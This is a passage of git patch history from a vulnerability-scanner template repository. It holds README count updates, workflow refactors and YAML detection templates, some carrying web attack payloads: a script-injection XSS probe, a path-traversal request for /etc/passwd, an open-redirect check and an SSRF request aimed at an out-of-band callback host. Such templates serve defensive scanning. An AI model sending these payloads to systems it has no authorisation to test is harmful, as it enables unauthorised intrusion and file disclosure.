+**127 directories, 1474 files**. From 0afef5362b8f864d7f78d1e9fc830998dffe7908 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 12 Jul 2021 19:22:26 +0000 Subject: [PATCH 0477/4083] Auto Update README [Mon Jul 12 19:22:26 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 371ea84927..0d52188d9d 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 394 | vulnerabilities | 216 | exposed-panels | 193 | +| cves | 395 | vulnerabilities | 216 | exposed-panels | 193 | | takeovers | 70 | exposures | 112 | technologies | 115 | | misconfiguration | 74 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 15 | -**127 directories, 1474 files**. +**127 directories, 1475 files**. From 3ff00786d3ff652107d8f57ba5a9eb90f895e91f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 12 Jul 2021 19:31:18 +0000 Subject: [PATCH 0478/4083] Auto Update README [Mon Jul 12 19:31:18 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 0d52188d9d..13ef3ccf0f 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 395 | vulnerabilities | 216 | exposed-panels | 193 | +| cves | 396 | vulnerabilities | 216 | exposed-panels | 193 | | takeovers | 70 | exposures | 112 | technologies | 115 | | misconfiguration | 74 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 15 | -**127 directories, 1475 files**. +**127 directories, 1476 files**. From 50fa6e1b26dda92722927b6c750f2f1b004887ba Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 12 Jul 2021 20:23:31 +0000 Subject: [PATCH 0479/4083] Auto Update README [Mon Jul 12 20:23:31 UTC 2021] :robot: --- README.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index 13ef3ccf0f..7c222d52da 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 396 | vulnerabilities | 216 | exposed-panels | 193 | -| takeovers | 70 | exposures | 112 | technologies | 115 | -| misconfiguration | 74 | workflows | 33 | miscellaneous | 27 | +| cves | 396 | vulnerabilities | 218 | exposed-panels | 193 | +| takeovers | 70 | exposures | 113 | technologies | 117 | +| misconfiguration | 76 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | -| fuzzing | 10 | helpers | 9 | iot | 15 | +| fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1476 files**. +**127 directories, 1487 files**. From 386520dbe8e3dfb0a4b930df8c91e1e49ca0cad5 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 13 Jul 2021 02:09:03 +0530 Subject: [PATCH 0480/4083] Tags support arrived in workflows :smile: - No more manual workflow updates --- workflows/gitlab-workflow.yaml | 6 +----- workflows/jira-workflow.yaml | 16 +--------------- workflows/springboot-workflow.yaml | 5 +---- workflows/weblogic-workflow.yaml | 5 +---- workflows/wordpress-workflow.yaml | 27 +-------------------------- 5 files changed, 5 insertions(+), 54 deletions(-) diff --git a/workflows/gitlab-workflow.yaml b/workflows/gitlab-workflow.yaml index d96356aa1c..c05d54cad2 100644 --- a/workflows/gitlab-workflow.yaml +++ b/workflows/gitlab-workflow.yaml @@ -10,8 +10,4 @@ workflows: - template: exposed-panels/gitlab-detect.yaml subtemplates: - - template: misconfiguration/gitlab/ - - template: vulnerabilities/gitlab/ - - template: cves/2020/CVE-2020-2096.yaml - - template: cves/2021/CVE-2021-22214.yaml - - template: default-logins/gitlab/gitlab-weak-login.yaml \ No newline at end of file + - tags: gitlab \ No newline at end of file diff --git a/workflows/jira-workflow.yaml b/workflows/jira-workflow.yaml index 7094005d99..52dc245749 100644 --- a/workflows/jira-workflow.yaml +++ b/workflows/jira-workflow.yaml @@ -9,19 +9,5 @@ info: workflows: - template: exposed-panels/jira-detect.yaml - subtemplates: - - template: cves/2017/CVE-2017-9506.yaml - - template: cves/2018/CVE-2018-20824.yaml - - template: cves/2019/CVE-2019-3396.yaml - - template: cves/2019/CVE-2019-3402.yaml - - template: cves/2019/CVE-2019-8442.yaml - - template: cves/2019/CVE-2019-8446.yaml - - template: cves/2019/CVE-2019-8449.yaml - - template: cves/2019/CVE-2019-8451.yaml - - template: cves/2019/CVE-2019-11581.yaml - - template: cves/2019/CVE-2019-3403.yaml - - template: cves/2020/CVE-2020-14179.yaml - - template: cves/2020/CVE-2020-14181.yaml - - template: cves/2020/CVE-2020-36289.yaml - - template: vulnerabilities/jira/ \ No newline at end of file + - tags: jira \ No newline at end of file diff --git a/workflows/springboot-workflow.yaml b/workflows/springboot-workflow.yaml index 4e2580e047..97b372c544 100644 --- a/workflows/springboot-workflow.yaml +++ b/workflows/springboot-workflow.yaml @@ -13,7 +13,4 @@ workflows: - template: technologies/springboot-actuator.yaml subtemplates: - - template: misconfiguration/springboot/ - - template: vulnerabilities/springboot/ - - template: cves/2018/CVE-2018-1271.yaml - - template: cves/2020/CVE-2020-5410.yaml \ No newline at end of file + - tags: springboot \ No newline at end of file diff --git a/workflows/weblogic-workflow.yaml b/workflows/weblogic-workflow.yaml index 6d9c069199..5834b6ca3e 100755 --- a/workflows/weblogic-workflow.yaml +++ b/workflows/weblogic-workflow.yaml @@ -10,7 +10,4 @@ workflows: - template: technologies/weblogic-detect.yaml subtemplates: - - template: cves/2017/CVE-2017-10271.yaml - - template: cves/2019/CVE-2019-2725.yaml - - template: cves/2020/CVE-2020-2551.yaml - - template: cves/2020/CVE-2020-14882.yaml + - tags: weblogic \ No newline at end of file diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml index 51dbbce347..e7ce984db9 100644 --- a/workflows/wordpress-workflow.yaml +++ b/workflows/wordpress-workflow.yaml @@ -11,29 +11,4 @@ workflows: matchers: - name: wordpress subtemplates: - - template: cves/2016/CVE-2016-10033.yaml - - template: cves/2017/CVE-2017-1000170.yaml - - template: cves/2017/CVE-2017-5487.yaml - - template: cves/2018/CVE-2018-3810.yaml - - template: cves/2018/CVE-2018-7422.yaml - - template: cves/2019/CVE-2019-6112.yaml - - template: cves/2019/CVE-2019-6715.yaml - - template: cves/2019/CVE-2019-9978.yaml - - template: cves/2019/CVE-2019-14205.yaml - - template: cves/2019/CVE-2019-15858.yaml - - template: cves/2019/CVE-2019-19985.yaml - - template: cves/2019/CVE-2019-20141.yaml - - template: cves/2020/CVE-2020-11738.yaml - - template: cves/2020/CVE-2020-24186.yaml - - template: cves/2020/CVE-2020-24312.yaml - - template: cves/2020/CVE-2020-25213.yaml - - template: cves/2020/CVE-2020-13700.yaml - - template: cves/2020/CVE-2020-14092.yaml - - template: cves/2020/CVE-2020-35951.yaml - - template: cves/2020/CVE-2020-35489.yaml - - template: cves/2021/CVE-2021-24146.yaml - - template: cves/2021/CVE-2021-24237.yaml - - template: cves/2021/CVE-2021-24176.yaml - - template: cves/2021/CVE-2021-24285.yaml - - template: cves/2021/CVE-2021-24316.yaml - - template: vulnerabilities/wordpress/ \ No newline at end of file + - tags: wordpress \ No newline at end of file From a91516cbb5491f9ce110453831c48f40207e206f Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 13 Jul 2021 05:24:03 +0700 Subject: [PATCH 0481/4083] Misplaced of CVE-2020-24148 --- cves/{2021 => 2020}/CVE-2020-24148.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cves/{2021 => 2020}/CVE-2020-24148.yaml (100%) diff --git a/cves/2021/CVE-2020-24148.yaml b/cves/2020/CVE-2020-24148.yaml similarity index 100% rename from cves/2021/CVE-2020-24148.yaml rename to cves/2020/CVE-2020-24148.yaml From 518986d16b5f92ffcffefeadb353a7b41eb8c51d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 13 Jul 2021 10:30:32 +0530 Subject: [PATCH 0482/4083] Create pgadmin-exposure.yaml --- exposed-panels/pgadmin-exposure.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposed-panels/pgadmin-exposure.yaml diff --git a/exposed-panels/pgadmin-exposure.yaml b/exposed-panels/pgadmin-exposure.yaml new file mode 100644 index 0000000000..b9b6e07c37 --- /dev/null +++ b/exposed-panels/pgadmin-exposure.yaml @@ -0,0 +1,26 @@ +id: pgadmin-exposure +info: + name: PostgreSQL - pgAdmin Dasboard Exposure + author: princechaddha + severity: info + tags: unauth,pgadmin,postgres,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/browser/" + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "PGADMIN_LANGUAGE=" + part: header + + - type: word + words: + - "pgAdmin" + part: body From d964e407422a52692bba59006765b227937104d2 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim <gy741.kim@gmail.com> Date: Tue, 13 Jul 2021 15:16:08 +0900 Subject: [PATCH 0483/4083] Create dell-wyse-management-suite-login.yaml Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> --- .../dell-wyse-management-suite-login.yaml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/dell-wyse-management-suite-login.yaml diff --git a/exposed-panels/dell-wyse-management-suite-login.yaml b/exposed-panels/dell-wyse-management-suite-login.yaml new file mode 100644 index 0000000000..6f6e5bd56a --- /dev/null +++ b/exposed-panels/dell-wyse-management-suite-login.yaml @@ -0,0 +1,23 @@ +id: dell-wyse-management-suite-login + +info: + name: Dell Wyse Management Suite Login Panel + author: gy741 + severity: info + reference: https://research.nccgroup.com/2021/07/06/technical-advisory-arbitrary-file-read-in-dell-wyse-management-suite-cve-2021-21586-cve-2021-21587/ + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/ccm-web/' + + matchers-condition: and + matchers: + - type: word + words: + - "<title>Wyse Management Suite" + + - type: status + status: + - 200 From 51d6477505c2642337590ed80690724935a92ebc Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 13 Jul 2021 14:10:37 +0530 Subject: [PATCH 0484/4083] Create unauthenticated-alert-manager.yaml --- .../unauthenticated-alert-manager.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 misconfiguration/unauthenticated-alert-manager.yaml diff --git a/misconfiguration/unauthenticated-alert-manager.yaml b/misconfiguration/unauthenticated-alert-manager.yaml new file mode 100644 index 0000000000..514f6f13a4 --- /dev/null +++ b/misconfiguration/unauthenticated-alert-manager.yaml @@ -0,0 +1,24 @@ +id: unauthenticated-alert-manager + +info: + name: Unauthenticated Alert Manager + author: dhiyaneshDK + severity: high + reference: https://www.shodan.io/search?query=http.title%3A%22Alertmanager%22 + tags: unauth,alertmanager + +requests: + - method: GET + path: + - "{{BaseURL}}/#/alerts" + + matchers-condition: and + matchers: + - type: word + words: + - 'Alertmanager' + condition: or + + - type: status + status: + - 200 From 19bdc25d213d8396cac6394c6ccc9cc60284ab4d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 13 Jul 2021 09:22:32 +0000 Subject: [PATCH 0485/4083] Auto Update README [Tue Jul 13 09:22:32 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 7c222d52da..21de885c7c 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 396 | vulnerabilities | 218 | exposed-panels | 193 | +| cves | 396 | vulnerabilities | 218 | exposed-panels | 194 | | takeovers | 70 | exposures | 113 | technologies | 117 | | misconfiguration | 76 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1487 files**. +**127 directories, 1488 files**. From 396431196032d4a66b4995316f73541cf36e214d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 13 Jul 2021 09:26:35 +0000 Subject: [PATCH 0486/4083] Auto Update README [Tue Jul 13 09:26:35 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 21de885c7c..12493c4ed5 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 396 | vulnerabilities | 218 | exposed-panels | 194 | +| cves | 396 | vulnerabilities | 218 | exposed-panels | 195 | | takeovers | 70 | exposures | 113 | technologies | 117 | | misconfiguration | 76 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1488 files**. +**127 directories, 1489 files**. From 47a07b533b64a54eecd257cacfefd9963bab197c Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 13 Jul 2021 14:59:11 +0530 Subject: [PATCH 0487/4083] moving files around --- .../wordpress/wordpress-wordfence-lfi.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename wordpress-wordfence-lfi.yaml => vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml (100%) diff --git a/wordpress-wordfence-lfi.yaml b/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml similarity index 100% rename from wordpress-wordfence-lfi.yaml rename to vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml From 40303119a4d81a6bcd93e37f332dcad86834f749 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 13 Jul 2021 09:30:19 +0000 Subject: [PATCH 0488/4083] Auto Update README [Tue Jul 13 09:30:19 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 12493c4ed5..ee3ea01102 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 396 | vulnerabilities | 218 | exposed-panels | 195 | +| cves | 396 | vulnerabilities | 219 | exposed-panels | 195 | | takeovers | 70 | exposures | 113 | technologies | 117 | | misconfiguration | 76 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1489 files**. +**127 directories, 1490 files**. From dfd9a2592b580ca178bf2156242e6d7acd6ec6a1 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 13 Jul 2021 15:04:42 +0530 Subject: [PATCH 0489/4083] moving files around --- .../2015/CVE-2015-7823.yaml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) rename kentico-open-redirect.yaml => cves/2015/CVE-2015-7823.yaml (57%) diff --git a/kentico-open-redirect.yaml b/cves/2015/CVE-2015-7823.yaml similarity index 57% rename from kentico-open-redirect.yaml rename to cves/2015/CVE-2015-7823.yaml index c4c9decbc0..c5329e007f 100644 --- a/kentico-open-redirect.yaml +++ b/cves/2015/CVE-2015-7823.yaml @@ -1,12 +1,14 @@ -id: kentico-open-redirect +id: CVE-2015-7823 info: - name: Web application Kentico CMS 8.2 Open Redirection + name: Kentico CMS 8.2 Open Redirection author: 0x_Akoko description: The GetDocLink.ashx with link variable is vulnerable to open redirect vulnerability - reference: https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html + reference: | + - https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html + - https://nvd.nist.gov/vuln/detail/CVE-2015-7823 severity: low - tags: kentico,redirect + tags: cve,cve2015,kentico,redirect requests: - method: GET @@ -17,4 +19,4 @@ requests: - type: regex regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - part: header + part: header \ No newline at end of file From 8b8197b72c8dc48f99b1a61d21facb044d89cec7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 13 Jul 2021 09:37:06 +0000 Subject: [PATCH 0490/4083] Auto Update README [Tue Jul 13 09:37:06 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index ee3ea01102..58f13fe9a6 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 396 | vulnerabilities | 219 | exposed-panels | 195 | +| cves | 397 | vulnerabilities | 219 | exposed-panels | 195 | | takeovers | 70 | exposures | 113 | technologies | 117 | | misconfiguration | 76 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1490 files**. +**127 directories, 1491 files**. From 06efff9ddd9b5a98193b96804297f761fc448501 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 13 Jul 2021 15:21:26 +0530 Subject: [PATCH 0491/4083] minor update --- vulnerabilities/wordpress/wp-church-admin-xss.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/wordpress/wp-church-admin-xss.yaml b/vulnerabilities/wordpress/wp-church-admin-xss.yaml index 1b1ef0d8bd..1b5fa990ab 100644 --- a/vulnerabilities/wordpress/wp-church-admin-xss.yaml +++ b/vulnerabilities/wordpress/wp-church-admin-xss.yaml @@ -1,4 +1,4 @@ -id: CVE-2020-29395 +id: wp-church-admin-xss info: name: WordPress Plugin church_admin - 'id' Reflected Cross-Site Scripting (XSS) @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3Cscript%3Ealert%28123%29%3C/script%3E' + - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3Cscript%3Ealert%28'{{randstr}}'%29%3C/script%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 7af0ad7253bb794670671e65563d05581b7203de Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 13 Jul 2021 09:52:50 +0000 Subject: [PATCH 0492/4083] Auto Update README [Tue Jul 13 09:52:50 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 58f13fe9a6..25cbcc7cf8 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 397 | vulnerabilities | 219 | exposed-panels | 195 | +| cves | 397 | vulnerabilities | 220 | exposed-panels | 195 | | takeovers | 70 | exposures | 113 | technologies | 117 | | misconfiguration | 76 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1491 files**. +**127 directories, 1492 files**. From a8be22ad0ac70883f9fde3dfd80588f424f1c9e9 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 13 Jul 2021 15:28:48 +0530 Subject: [PATCH 0493/4083] Removed as it requires admin login --- .../wordpress/wp-supsystic-backup-lfi.yaml | 19 ------------------- 1 file changed, 19 deletions(-) delete mode 100644 vulnerabilities/wordpress/wp-supsystic-backup-lfi.yaml diff --git a/vulnerabilities/wordpress/wp-supsystic-backup-lfi.yaml b/vulnerabilities/wordpress/wp-supsystic-backup-lfi.yaml deleted file mode 100644 index 31828da3e2..0000000000 --- a/vulnerabilities/wordpress/wp-supsystic-backup-lfi.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: wp-supsystic-backup-lfi - -info: - name: WordPress Plugin Supsystic Backup 2.3.9 - Local File Inclusion - author: daffainfo - severity: high - reference: https://www.exploit-db.com/exploits/49545 - tags: wordpress,wp-plugin,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-admin/admin.php?page=supsystic-backup&tab=bupLog&download=../../../../../../../../../etc/passwd" - - matchers: - - type: regex - regex: - - "root:[x*]:0:0:" - part: body From 6e73d623cedb777dc317f91922623cfc24f615e1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 13 Jul 2021 10:00:07 +0000 Subject: [PATCH 0494/4083] Auto Update README [Tue Jul 13 10:00:07 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 25cbcc7cf8..99e4ed0935 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 397 | vulnerabilities | 220 | exposed-panels | 195 | +| cves | 397 | vulnerabilities | 221 | exposed-panels | 195 | | takeovers | 70 | exposures | 113 | technologies | 117 | | misconfiguration | 76 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1492 files**. +**127 directories, 1493 files**. From bb6561edebf940dc45de872d1f41ad446c86ae71 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 13 Jul 2021 10:07:19 +0000 Subject: [PATCH 0495/4083] Auto Update README [Tue Jul 13 10:07:19 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 99e4ed0935..dfc773b379 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 397 | vulnerabilities | 221 | exposed-panels | 195 | +| cves | 397 | vulnerabilities | 222 | exposed-panels | 195 | | takeovers | 70 | exposures | 113 | technologies | 117 | | misconfiguration | 76 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1493 files**. +**127 directories, 1494 files**. From 67a679860e664d136bbc10c805eb1850bc900e71 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Tue, 13 Jul 2021 15:41:44 +0530 Subject: [PATCH 0496/4083] Update wp-finder-xss.yaml --- vulnerabilities/wordpress/wp-finder-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wp-finder-xss.yaml b/vulnerabilities/wordpress/wp-finder-xss.yaml index d6abe3a568..c2141ac880 100644 --- a/vulnerabilities/wordpress/wp-finder-xss.yaml +++ b/vulnerabilities/wordpress/wp-finder-xss.yaml @@ -10,7 +10,7 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3Cscript%3Ealert(123);%3C/script%3E ' + - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3Cscript%3Ealert(123);%3C/script%3E' matchers-condition: and matchers: From 5eb4079f480e81b92b04f411605f21c2afc1763b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 13 Jul 2021 10:12:48 +0000 Subject: [PATCH 0497/4083] Auto Update README [Tue Jul 13 10:12:48 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index dfc773b379..aa81f9946b 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 397 | vulnerabilities | 222 | exposed-panels | 195 | +| cves | 397 | vulnerabilities | 223 | exposed-panels | 195 | | takeovers | 70 | exposures | 113 | technologies | 117 | | misconfiguration | 76 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1494 files**. +**127 directories, 1495 files**. From 02ae0b275dee658c87e869e3d036b2550da0ba65 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 13 Jul 2021 10:16:11 +0000 Subject: [PATCH 0498/4083] Auto Update README [Tue Jul 13 10:16:11 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index aa81f9946b..8d73e19455 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 397 | vulnerabilities | 223 | exposed-panels | 195 | +| cves | 397 | vulnerabilities | 224 | exposed-panels | 195 | | takeovers | 70 | exposures | 113 | technologies | 117 | | misconfiguration | 76 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1495 files**. +**127 directories, 1496 files**. From 5fe872788fd83a104dcd33df1bbd561013e72e30 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 13 Jul 2021 15:57:10 +0530 Subject: [PATCH 0499/4083] minor update --- .../other/hasura-graphql-ssrf.yaml | 34 ++++++++++--------- 1 file changed, 18 insertions(+), 16 deletions(-) diff --git a/vulnerabilities/other/hasura-graphql-ssrf.yaml b/vulnerabilities/other/hasura-graphql-ssrf.yaml index e2fded76dc..33cb9aab7d 100644 --- a/vulnerabilities/other/hasura-graphql-ssrf.yaml +++ b/vulnerabilities/other/hasura-graphql-ssrf.yaml @@ -20,22 +20,24 @@ requests: Connection: close { - "type":"bulk", - "args":[ - { - "type":"add_remote_schema", - "args":{ - "name":"test", - "definition":{ - "url":"https://{{interactsh-url}}", - "headers":[], - "timeout_seconds":60, - "forward_client_headers":true - } - } - } - ] - } + "type":"bulk", + "args":[ + { + "type":"add_remote_schema", + "args":{ + "name":"test", + "definition":{ + "url":"https://{{interactsh-url}}", + "headers":[ + + ], + "timeout_seconds":60, + "forward_client_headers":true + } + } + } + ] + } matchers-condition: and matchers: From c8c49c5046582a33885b068b1595dabf616c03b4 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 13 Jul 2021 15:58:06 +0530 Subject: [PATCH 0500/4083] Update hasura-graphql-ssrf.yaml --- vulnerabilities/other/hasura-graphql-ssrf.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/vulnerabilities/other/hasura-graphql-ssrf.yaml b/vulnerabilities/other/hasura-graphql-ssrf.yaml index 33cb9aab7d..fc77816080 100644 --- a/vulnerabilities/other/hasura-graphql-ssrf.yaml +++ b/vulnerabilities/other/hasura-graphql-ssrf.yaml @@ -29,7 +29,6 @@ requests: "definition":{ "url":"https://{{interactsh-url}}", "headers":[ - ], "timeout_seconds":60, "forward_client_headers":true From 53bed168cce5619e18b991c56779d4ce31ce153f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 13 Jul 2021 10:28:45 +0000 Subject: [PATCH 0501/4083] Auto Update README [Tue Jul 13 10:28:45 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 8d73e19455..ffe90b8c48 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 397 | vulnerabilities | 224 | exposed-panels | 195 | +| cves | 397 | vulnerabilities | 225 | exposed-panels | 195 | | takeovers | 70 | exposures | 113 | technologies | 117 | | misconfiguration | 76 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1496 files**. +**127 directories, 1497 files**. From b18951a7a4e1fdc95f977213720c7f6c01aa8d07 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Tue, 13 Jul 2021 16:03:25 +0530 Subject: [PATCH 0502/4083] Update dell-wyse-management-suite-login.yaml --- exposed-panels/dell-wyse-management-suite-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/dell-wyse-management-suite-login.yaml b/exposed-panels/dell-wyse-management-suite-login.yaml index 6f6e5bd56a..09824b09b1 100644 --- a/exposed-panels/dell-wyse-management-suite-login.yaml +++ b/exposed-panels/dell-wyse-management-suite-login.yaml @@ 